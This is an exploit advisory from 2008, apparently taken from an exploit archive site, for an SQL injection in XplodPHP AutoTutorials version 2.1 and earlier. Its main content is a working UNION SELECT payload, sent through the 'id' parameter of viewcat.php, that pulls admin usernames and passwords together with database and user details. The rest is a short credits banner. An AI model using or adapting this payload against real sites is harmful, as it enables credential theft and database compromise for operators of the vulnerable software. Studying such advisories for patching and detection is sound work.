XplodPHP AutoTutorials <= 2.1 (id) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : XplodPHP AutoTutorials <= 2.1 (id) SQL Injection Vulnerability
# Published : 2008-04-16
# Author : cO2
# Previous Title : Carbon Communities <= 2.4 Multiple Remote Vulnerabilities
# Next Title : Classifieds Caffe (index.php cat_id) SQL Injection Vulnerability

[  A L G E R I A     S E C U R I T Y    C R E W  ]
###################################################
[~] XplodPHP Remote SQL Injection Vulnerability
                                                                                                               
[~] Founder: cO2 [ Algeria Security Crew ]
[~] HomePage: http://www.DZ-Secure.com
[~] Greatz : To all Hackerz from Algeria & All My Friends . . .
[~] Contact: c02@Hotmail.de
[~] Exploit :
http://www.xxx.org/viewcat.php?id=10/**/union/**/select/**/null,user(),concat(username,0x3e,password),null,null,database(),null,null,null/**/from/**/admin/*
---------------------
http://www.DZ-Secure.com
---------------------
###############################################

# www.Syue.com [2008-04-16]